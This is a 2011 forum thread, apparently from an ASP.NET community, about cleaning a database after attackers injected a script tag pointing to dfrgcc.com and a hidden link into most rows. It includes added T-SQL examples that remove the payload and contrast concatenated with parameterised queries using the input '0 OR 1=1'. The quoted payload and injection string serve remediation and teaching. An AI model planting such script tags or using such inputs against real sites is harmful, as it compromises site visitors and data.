sheraz_aries
Member
SQL Injection script
Sep 20, 2011 04:03 PM
We have a SQL injection effect on our database and I can see
</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=7 >crack</a>
placed on almost every single row.
I am trying to use the SQL REPLACE function to remove that, but in the script the id value changes (/show.php?id=7).
Is there any other way to grab all of them and replace them with ''?
Thanks
kwanann
Contributor
MVP
Re: SQL Injection script
Sep 20, 2011 04:14 PM
Assuming you want to replace all these fields with an empty string, it could be:
update [table] set [field]=''
where [field] like '%http://dfrgcc.com/ur.php%'
View my blog @ http://jefferytay.wordpress.com
Mikesdotnett...
All-Star
Moderator
MVP
Re: SQL Injection script
Sep 20, 2011 04:14 PM
You can use regular expressions: http://msdn.microsoft.com/en-us/magazine/cc163473.aspx
Beginning ASP.NET Web Pages with WebMatrix | My Site | Twitter
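An added example, not posted by anyone in this thread: a T-SQL cleanup that removes only the injected span from each value, whatever `id=` number it carries, instead of blanking the field. The table `#Articles` and its columns are hypothetical, and the sample rows are constructed from the payload quoted in the question.

```sql
-- Added example (T-SQL, SQL Server 2008 or later). #Articles, Id and Body
-- are hypothetical names; substitute the affected table, key and column.
SET NOCOUNT ON;

CREATE TABLE #Articles (Id int PRIMARY KEY, Body nvarchar(max));
INSERT INTO #Articles (Id, Body) VALUES
 (1, N'First post</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=7 >crack</a>'),
 (2, N'Second post</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=31 >crack</a> trailing text'),
 (3, N'Clean row');

-- The payload always opens with @start and closes with @end; only the
-- text in between (the id value) varies from row to row.
DECLARE @start nvarchar(200), @end nvarchar(10), @rows int;
SET @start = N'</title><script src=http://dfrgcc.com/ur.php>';
SET @end   = N'</a>';

-- Keep a copy of every row about to be changed, for review and rollback.
SELECT Id, Body INTO #Articles_backup
FROM #Articles
WHERE CHARINDEX(@start, Body) > 0;

-- Each pass cuts one payload per row: from @start through the first @end
-- that follows it. The loop repeats for rows that were hit more than once
-- and stops when a pass changes nothing.
SET @rows = 1;
WHILE @rows > 0
BEGIN
    UPDATE a
    SET a.Body = STUFF(a.Body, x.s, y.e - x.s + LEN(@end), N'')
    FROM #Articles AS a
    CROSS APPLY (SELECT CHARINDEX(@start, a.Body) AS s) AS x
    CROSS APPLY (SELECT CHARINDEX(@end, a.Body, x.s) AS e) AS y
    WHERE x.s > 0 AND y.e > 0;   -- rows without a complete payload are skipped
    SET @rows = @@ROWCOUNT;
END;

-- Compare cleaned rows with the saved originals before dropping the backup.
SELECT a.Id, b.Body AS before_cleanup, a.Body AS after_cleanup
FROM #Articles AS a
JOIN #Articles_backup AS b ON b.Id = a.Id
ORDER BY a.Id;
```

Run it inside a transaction against a real table and review the before/after pairs before committing.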
RegalCompute...
Member
Re: SQL Injection script
Sep 20, 2011 09:57 PM
Who are you hosted with? I have 5 SQL databases with GoDaddy, and in the last few hours 2 have been infected with the same virus. I am not sure it is SQL injection, as our websites are fairly well secured and there are little to no user-passed queries that can be executed. Neither site is related to the other, so I think this is an attack on the server directly.
I doubt you are with GoDaddy, but as you have had this infection today it seems to be a pretty odd similarity!
Right now I am just manually removing the malicious code; luckily it has only hit 2 of my smallest databases.
If you come up with a good script, I would appreciate you sharing it :)
Good luck!
wishyouwell
Member
Re: SQL Injection script
Sep 21, 2011 01:50 AM
I saw the same thing today. It's the second time. It happened a few weeks ago too.
I'm helping someone out that has GoDaddy SQL hosting. I thought it was SQL injection but I see that people here think maybe it isn't.
I'm going to get them off GoDaddy. GoDaddy leaves their db server exposed. I can connect to it from my local computer as long as I have the db password. I can see all of the other databases that are on the server but I can't browse into them. Still, that doesn't feel so secure.
Mikesdotnett...
All-Star
Moderator
MVP
Re: SQL Injection script
Sep 21, 2011 04:33 AM
They are wrong. This problem is most certainly the result of SQL injection.
Wrong and probably libellous. Poor programmers leave their db exposed.
wishyouwell
Member
Re: SQL Injection script
Sep 21, 2011 04:36 AM
I'm just saying they leave it exposed so that you can open it in SQL Management Studio remotely and connect right to it and see the names of all the other databases. That's 100% true.
Mikesdotnett...
All-Star
Moderator
MVP
Re: SQL Injection script
Sep 21, 2011 04:39 AM
Do you have any queries that are formed by concatenating strings? If you have, you need to replace them with parameterised queries immediately, otherwise you will see a recurrence of the issue regardless of where you host your site.
Nonsense. Google "<script src=http://dfrgcc.com/ur.php></script>" to see how many other sites have been affected. They are not all hosted in the same place.
Mikesdotnett...
All-Star
Moderator
MVP
Re: SQL Injection script
Sep 21, 2011 04:40 AM
That doesn't provide an avenue of attack. Check your code after reading this: http://www.mikesdotnetting.com/Article/113/Preventing-SQL-Injection-in-ASP.NET
RegalCompute...
Member
Re: SQL Injection script
Sep 21, 2011 09:01 AM
With other hosts I normally have error logging set up so that I can view all of the failed attempts by hackers at SQL injection; it is quite fun to watch all of the different attempts made. With the way Google is set up, I have not found a successful way to enable a custom error logging solution.
As far as the database goes, one page of one of the sites has a custom search box which does allow for user input which is passed to the database; the other does not.
Except for that there is no passing of parameters from the site to the database. All other queries are for data retrieval only.
This is why I do not believe it to be a SQL injection attack. GoDaddy responded to say they don't believe it is a problem with their server, which is kind of typical; no host ever admits fault unless they get bombarded by complaints.
I know what a SQL injection attack looks like and this just does not look like one. I could be wrong, but two unassociated databases being hit at the same time seems a little weird to me unless it is the database server.
Having had databases hosted with SoftLayer, I have had my fair share of experience securing a database from SQL injection, so I use stored procedures throughout and escape single and double quotes to largely prevent the majority of the basic SQL injection attempts. I am not saying my site is foolproof, as the moment you say that, some 12-year-old kid pops up that is high on Mountain Dew and hey presto, your website is hacked again!
GoDaddy response:
Upon review of your account, I was unable to
find any issues with your database. As you are on a shared server, any
compromises of the server itself would affect many customers and as such, we
would be aware of the issue very quickly. As of right now we have not been
notified of any compromises on any database servers within our system. Please
proceed with changing your passwords and reviewing the security of your
scripting and please let us know if the issue begins to reoccur.
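An added example, not posted by anyone in this thread: the difference between a concatenated query and a parameterised one, shown inside stored procedures, because a procedure that builds its statement by concatenation is exposed in the same way even when quotes are escaped. `dbo.Products` and both procedure names are hypothetical, and the rows and input string are constructed.

```sql
-- Added example (T-SQL). GO is the batch separator used by SSMS and sqlcmd.
CREATE TABLE dbo.Products (Id int PRIMARY KEY, Name nvarchar(100));
INSERT INTO dbo.Products (Id, Name) VALUES (1, N'Widget');
INSERT INTO dbo.Products (Id, Name) VALUES (2, N'Gadget');
GO

-- Weak: escapes quotes, then concatenates the value into the statement.
-- The value lands in a numeric position, so there is no quote to escape.
CREATE PROCEDURE dbo.GetProduct_Concat @id nvarchar(50)
AS
BEGIN
    DECLARE @sql nvarchar(4000);
    SET @sql = N'SELECT Id, Name FROM dbo.Products WHERE Id = '
             + REPLACE(@id, N'''', N'''''');
    EXEC (@sql);
END;
GO

-- Hardened: static statement with a typed parameter. The value is bound
-- as an int and never becomes part of the statement text.
CREATE PROCEDURE dbo.GetProduct_Param @id int
AS
BEGIN
    SELECT Id, Name FROM dbo.Products WHERE Id = @id;
END;
GO

-- Constructed input that contains no quote characters at all.
DECLARE @input nvarchar(50);
SET @input = N'0 OR 1=1';

-- Concatenated: the input is parsed as part of the WHERE clause, so the
-- condition is no longer "Id equals one value".
EXEC dbo.GetProduct_Concat @id = @input;

-- Parameterised: the same input has to convert to int before the
-- procedure body runs, and the conversion error stops the call.
EXEC dbo.GetProduct_Param @id = @input;
```

From ASP.NET the same rule applies on the calling side: pass values through `SqlParameter` objects instead of building the command text from strings.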